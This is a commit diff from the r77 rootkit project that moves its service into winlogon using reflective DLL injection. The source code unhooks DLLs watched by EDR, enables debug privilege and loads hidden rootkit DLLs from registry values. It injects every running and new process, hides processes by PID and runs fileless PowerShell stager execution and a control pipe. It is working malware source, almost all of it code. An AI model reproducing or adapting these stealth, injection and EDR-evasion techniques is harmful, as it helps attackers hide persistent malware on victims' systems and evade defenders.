r77 service injected into winlogon instead of own process

Author: bytecode77

Stager/RunPE.cs renamed to $Docs/RunPE.removed.cs

@@ -96,16 +96,7 @@ BOOL GetProcessList(PPROCESS_LIST_ENTRY entries, LPDWORD count)
 }
 BOOL CreateConfigSystem()
 {
-	HKEY key;
-	if (InstallR77Config(&key))
-	{
-		RegCloseKey(key);
-		return TRUE;
-	}
-	else
-	{
-		return FALSE;
-	}
+	return InstallR77Config();
 }
 BOOL Inject(DWORD processId, LPBYTE dll, DWORD dllSize)
 {

Helper/Helper.c

@@ -21,7 +21,7 @@ int main()
 		RegSetValueExW(key, HIDE_PREFIX L"stager", 0, REG_BINARY, stager, stagerSize) != ERROR_SUCCESS) return 0;
 
 	// This powershell command loads the stager from the registry and executes it in memory using Assembly.Load().EntryPoint.Invoke()
-	// The C# binary will proceed with creating a native process using process hollowing.
+	// The C# binary will proceed with starting the r77 service using reflective DLL injection.
 	// The powershell command is purely inline and doesn't require a ps1 file.
 
 	LPWSTR powershellCommand = GetPowershellCommand();

Install/Install.c

@@ -2,11 +2,11 @@
 #include "r77def.h"
 #include "r77win.h"
 
-VOID ControlPipeListener(CONTROLCALLBACK callback)
+HANDLE ControlPipeListener(CONTROLCALLBACK callback)
 {
-	CreateThread(NULL, 0, ControlPipeListenerThread, callback, 0, NULL);
+	return CreateThread(NULL, 0, ControlPipeListenerThreadFunction, callback, 0, NULL);
 }
-DWORD WINAPI ControlPipeListenerThread(LPVOID parameter)
+static DWORD WINAPI ControlPipeListenerThreadFunction(LPVOID parameter)
 {
 	while (TRUE)
 	{

Service/ControlPipeListener.c

@@ -11,7 +11,10 @@ typedef VOID(*CONTROLCALLBACK)(DWORD controlCode, HANDLE pipe);
 /// Creates a new listener for the control pipe that receives commands from any process.
 /// </summary>
 /// <param name="callback">The function that is called, when a command is received by another process.</param>
-VOID ControlPipeListener(CONTROLCALLBACK callback);
-static DWORD WINAPI ControlPipeListenerThread(LPVOID parameter);
+/// <returns>
+/// A handle to the newly created control pipe listener thread.
+/// </returns>
+HANDLE ControlPipeListener(CONTROLCALLBACK callback);
+static DWORD WINAPI ControlPipeListenerThreadFunction(LPVOID parameter);
 
 #endif

Service/ControlPipeListener.h

@@ -3,18 +3,12 @@
 #include "r77win.h"
 #include <Psapi.h>
 
-VOID NewProcessListener(DWORD interval, PROCESSIDCALLBACK callback)
+HANDLE NewProcessListener(PROCESSIDCALLBACK callback)
 {
-	PNEW_PROCESS_LISTENER notifier = NEW(NEW_PROCESS_LISTENER);
-	notifier->Interval = interval;
-	notifier->Callback = callback;
-
-	CreateThread(NULL, 0, NewProcessListenerThread, notifier, 0, NULL);
+	return CreateThread(NULL, 0, NewProcessListenerThreadFunction, callback, 0, NULL);
 }
-static DWORD WINAPI NewProcessListenerThread(LPVOID parameter)
+static DWORD WINAPI NewProcessListenerThreadFunction(LPVOID parameter)
 {
-	PNEW_PROCESS_LISTENER notifier = (PNEW_PROCESS_LISTENER)parameter;
-
 	LPDWORD currendProcesses = NEW_ARRAY(DWORD, 10000);
 	LPDWORD previousProcesses = NEW_ARRAY(DWORD, 10000);
 	DWORD currendProcessCount = 0;
@@ -40,24 +34,27 @@ static DWORD WINAPI NewProcessListenerThread(LPVOID parameter)
 					}
 				}
 
-				if (isNew) notifier->Callback(currendProcesses[i]);
+				if (isNew)
+				{
+					((PROCESSIDCALLBACK)parameter)(currendProcesses[i]);
+				}
 			}
 
 			i_memcpy(previousProcesses, currendProcesses, sizeof(DWORD) * 10000);
 			previousProcessCount = currendProcessCount;
 		}
 
-		Sleep(notifier->Interval);
+		Sleep(100);
 	}
 
 	return 0;
 }
 
-VOID ChildProcessListener(PROCESSIDCALLBACK callback)
+HANDLE ChildProcessListener(PROCESSIDCALLBACK callback)
 {
-	CreateThread(NULL, 0, ChildProcessListenerThread, callback, 0, NULL);
+	return CreateThread(NULL, 0, ChildProcessListenerThreadFunction, callback, 0, NULL);
 }
-static DWORD WINAPI ChildProcessListenerThread(LPVOID parameter)
+static DWORD WINAPI ChildProcessListenerThreadFunction(LPVOID parameter)
 {
 	while (TRUE)
 	{

Service/ProcessListener.c

@@ -8,33 +8,23 @@
 typedef VOID(*PROCESSIDCALLBACK)(DWORD processId);
 
 /// <summary>
-/// Defines a listener, that checks for new processes in a given interval.
+/// Creates a new process listener, that checks for new processes every 100 ms.
 /// </summary>
-typedef struct _NEW_PROCESS_LISTENER
-{
-	/// <summary>
-	/// The interval, in milliseconds, between each enumeration of running processes.
-	/// </summary>
-	DWORD Interval;
-	/// <summary>
-	/// The function that is called, when a process is found that was not present in the previous enumeration.
-	/// </summary>
-	PROCESSIDCALLBACK Callback;
-} NEW_PROCESS_LISTENER, *PNEW_PROCESS_LISTENER;
-
-/// <summary>
-/// Creates a new process listener, that checks for new processes in a given interval.
-/// </summary>
-/// <param name="interval">The interval, in milliseconds, between each enumeration of running processes.</param>
 /// <param name="callback">The function that is called, when a process is found that was not present in the previous enumeration.</param>
-VOID NewProcessListener(DWORD interval, PROCESSIDCALLBACK callback);
-static DWORD WINAPI NewProcessListenerThread(LPVOID parameter);
+/// <returns>
+/// A handle to the newly created process listener thread.
+/// </returns>
+HANDLE NewProcessListener(PROCESSIDCALLBACK callback);
+static DWORD WINAPI NewProcessListenerThreadFunction(LPVOID parameter);
 
 /// <summary>
 /// Creates a named pipe that listens for notifications about created child processes.
 /// </summary>
 /// <param name="callback">The function that is called, when the named pipe received a process ID.</param>
-VOID ChildProcessListener(PROCESSIDCALLBACK callback);
-static DWORD WINAPI ChildProcessListenerThread(LPVOID parameter);
+/// <returns>
+/// A handle to the newly created child process listener thread.
+/// </returns>
+HANDLE ChildProcessListener(PROCESSIDCALLBACK callback);
+static DWORD WINAPI ChildProcessListenerThreadFunction(LPVOID parameter);
 
 #endif

Service/ProcessListener.h

@@ -4,66 +4,79 @@
 #include "r77win.h"
 #include "r77config.h"
 #include "r77process.h"
+#include "r77header.h"
 #include "ProcessListener.h"
 #include "ControlPipeListener.h"
 #include <Psapi.h>
 
-int main()
+BOOL WINAPI DllMain(_In_ HINSTANCE module, _In_ DWORD reason, _In_ LPVOID reserved)
+{
+	if (reason == DLL_PROCESS_ATTACH)
+	{
+		if (!InitializeService())
+		{
+			// If the r77 service could not initialize, it is either already attached, or failed to initialize, detach the DLL.
+			return FALSE;
+		}
+	}
+	else if (reason == DLL_PROCESS_DETACH)
+	{
+		UninitializeService();
+	}
+
+	return TRUE;
+}
+
+BOOL InitializeService()
 {
 	// Unhook DLL's that are monitored by EDR.
 	Unhook();
 
+	// If the service is already running (e.g. Install.exe was run twice), gracefully terminate it, and continue initialization.
+	LPVOID existingServiceDetachAddress;
+	if (GetR77Header(&existingServiceDetachAddress) == R77_SERVICE_SIGNATURE)
+	{
+		// The DetachService() function pointer to the already running r77 service is called.
+		// After this function returns, the previous r77 service is completely unloaded.
+
+		((VOID(*)())existingServiceDetachAddress)();
+	}
+
+	// Write the r77 header.
+	if (!WriteR77Header(R77_SERVICE_SIGNATURE, DetachService)) return FALSE;
+
 	EnabledDebugPrivilege();
 
 	// Get both r77 DLL's.
 	HKEY key;
 	if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE", 0, KEY_QUERY_VALUE, &key) != ERROR_SUCCESS ||
 		RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, NULL, &Dll32Size) != ERROR_SUCCESS ||
-		RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, NULL, &Dll64Size) != ERROR_SUCCESS) return 0;
+		RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, NULL, &Dll64Size) != ERROR_SUCCESS) return FALSE;
 
 	Dll32 = NEW_ARRAY(BYTE, Dll32Size);
 	Dll64 = NEW_ARRAY(BYTE, Dll64Size);
 
 	if (RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, Dll32, &Dll32Size) != ERROR_SUCCESS ||
-		RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, Dll64, &Dll64Size) != ERROR_SUCCESS) return 0;
+		RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, Dll64, &Dll64Size) != ERROR_SUCCESS) return FALSE;
 
 	RegCloseKey(key);
 
-	// Terminate the already running r77 service process.
-	TerminateR77Service(GetCurrentProcessId());
-
 	// Create HKEY_LOCAL_MACHINE\SOFTWARE\$77config and set DACL to allow full access by any user.
-	HKEY configKey;
-	if (InstallR77Config(&configKey))
-	{
-		// Write current process ID to the list of hidden PID's.
-		// Since this process is created using process hollowing (dllhost.exe), the name cannot begin with "$77".
-		// Therefore, process hiding by PID must be used.
-		HKEY pidKey;
-		if (RegCreateKeyExW(configKey, L"pid", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &pidKey, NULL) == ERROR_SUCCESS)
-		{
-			// The registry values "svc32" and "svc64" are reserved for the r77 service.
-			DWORD processId = GetCurrentProcessId();
-			RegSetValueExW(pidKey, COALESCE_BITNESS(L"svc32", L"svc64"), 0, REG_DWORD, (LPBYTE)&processId, sizeof(DWORD));
-			RegCloseKey(pidKey);
-		}
-
-		RegCloseKey(configKey);
-	}
+	InstallR77Config();
 
 	// When the NtResumeThread hook is called, the r77 service is notified through a named pipe connection.
 	// This will trigger the following callback and the child process is injected.
 	// After it's injected, NtResumeThread is executed in the parent process.
 	// This way, r77 is injected before the first instruction is run in the child process.
-	ChildProcessListener(ChildProcessCallback);
+	ChildProcessListenerThread = ChildProcessListener(ChildProcessCallback);
 
 	// In addition, check for new processes every 100 ms that might have been missed by child process hooking.
 	// This is particularly the case for child processes of protected processes (such as services.exe), because protected processes cannot be injected.
 	// In the first iteration, the callback is invoked for every currently running process, making this the initial injection into all processes.
-	NewProcessListener(100, NewProcessCallback);
+	NewProcessListenerThread = NewProcessListener(NewProcessCallback);
 
 	// Open a named pipe to receive commands from any process.
-	ControlPipeListener(ControlCallback);
+	ControlPipeListenerThread = ControlPipeListener(ControlCallback);
 
 	// There are no implications when injecting a process twice.
 	// If the R77_SIGNATURE is already present in the target process, the newly injected DLL will just unload itself.
@@ -78,9 +91,40 @@ int main()
 
 	DeleteR77Config(config);
 
-	Sleep(INFINITE);
-	return 0;
+	return TRUE;
+}
+VOID UninitializeService()
+{
+	if (ChildProcessListenerThread)
+	{
+		TerminateThread(ChildProcessListenerThread, 0);
+		ChildProcessListenerThread = NULL;
+	}
+
+	if (NewProcessListenerThread)
+	{
+		TerminateThread(NewProcessListenerThread, 0);
+		NewProcessListenerThread = NULL;
+	}
+
+	RemoveR77Header();
+
+	if (ControlPipeListenerThread)
+	{
+		// Terminating the control pipe thread must be the last action!
+		// If this funcion was called from ControlCallback, the current thread will terminate,
+		// thus, this function will cease to execute.
+
+		TerminateThread(ControlPipeListenerThread, 0);
+		ControlPipeListenerThread = NULL;
+	}
 }
+static VOID DetachService()
+{
+	// A thread was created with a pointer to DetachService(), thus requesting the r77 service to remove itself gracefully.
+	UninitializeService();
+}
+
 VOID ChildProcessCallback(DWORD processId)
 {
 	// Hook the newly created child processes before it is actually started.
@@ -110,7 +154,7 @@ VOID ControlCallback(DWORD controlCode, HANDLE pipe)
 	{
 		case CONTROL_R77_TERMINATE_SERVICE:
 		{
-			ExitProcess(0);
+			UninitializeService();
 			break;
 		}
 		case CONTROL_R77_UNINSTALL:
@@ -127,7 +171,7 @@ VOID ControlCallback(DWORD controlCode, HANDLE pipe)
 			DeleteScheduledTask(R77_SERVICE_NAME64);
 			DetachAllInjectedProcesses();
 			UninstallR77Config();
-			TerminateR77Service(-1);
+			UninitializeService();
 			break;
 		}
 		case CONTROL_R77_PAUSE_INJECTION:

Service/Service.c

@@ -1,5 +1,5 @@
-#define CUSTOM_ENTRY
 #include "r77mindef.h"
+#include "ReflectiveDllMain.h"
 
 /// <summary>
 /// The 32-bit r77 DLL.
@@ -18,11 +18,43 @@ LPBYTE Dll64;
 /// </summary>
 DWORD Dll64Size;
 /// <summary>
+/// The thread that listens for notifications about created child processes.
+/// </summary>
+HANDLE ChildProcessListenerThread;
+/// <summary>
+/// The thread that checks for new processes every 100 ms.
+/// </summary>
+HANDLE NewProcessListenerThread;
+/// <summary>
+/// The thread that listens for commands on the control pipe.
+/// </summary>
+HANDLE ControlPipeListenerThread;
+/// <summary>
 /// Specifies whether to temporarily pause injection.
 /// <para>This flag is related to the CONTROL_R77_PAUSE_INJECTION control code.</para>
 /// </summary>
 BOOL IsInjectionPaused;
 
+BOOL WINAPI DllMain(_In_ HINSTANCE module, _In_ DWORD reason, _In_ LPVOID reserved);
+
+/// <summary>
+/// Initializes the r77 service and writes the r77 header.
+/// </summary>
+/// <returns>
+/// TRUE, if the r77 service was successfully loaded;
+/// otherwise, FALSE.
+/// </returns>
+BOOL InitializeService();
+/// <summary>
+/// Detaches the r77 service cfrom this process.
+/// </summary>
+VOID UninitializeService();
+/// <summary>
+/// A function that can be invoked using NtCreateThreadEx to detach the r77 service from this process.
+/// <para>The address of this function is written to the r77 header.</para>
+/// </summary>
+static VOID DetachService();
+
 /// <summary>
 /// Callback for newly created child processes that should be injected.
 /// </summary>